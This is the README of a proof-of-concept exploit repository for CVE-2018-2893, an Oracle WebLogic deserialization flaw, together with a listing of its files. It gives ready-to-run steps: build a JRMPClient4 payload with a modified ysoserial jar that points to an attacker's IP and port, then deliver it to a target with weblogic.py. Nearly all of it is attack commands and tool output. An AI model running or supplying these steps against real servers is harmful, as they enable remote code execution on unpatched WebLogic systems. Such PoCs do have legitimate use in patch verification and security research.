CVE-2018-2893 PoC# CVE-2018-2893
## Step 1
`java -jar ysoserial-cve-2018-2893.jar`
```
WHY SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
Available payload types:
Payload Authors Dependencies
------- ------- ------------
JRMPClient @mbechler
JRMPClient2 @pynerd
JRMPClient3 @pynerd
JRMPClient4 @pynerd
Jdk7u21 @frohoff
```
## Step 2
`java -jar ysoserial-cve-2018-2893.jar JRMPClient4 "<ip>:<port>" > poc4.ser`
## Step 3
`python weblogic.py <host> <port> poc4.ser`
[4.0K] /data/pocs/8f6f4c07046a9850d6250bce76c6036893470f20
├── [ 539] README.md
├── [5.3K] weblogic.py
└── [7.0M] ysoserial-cve-2018-2893.jar
0 directories, 3 files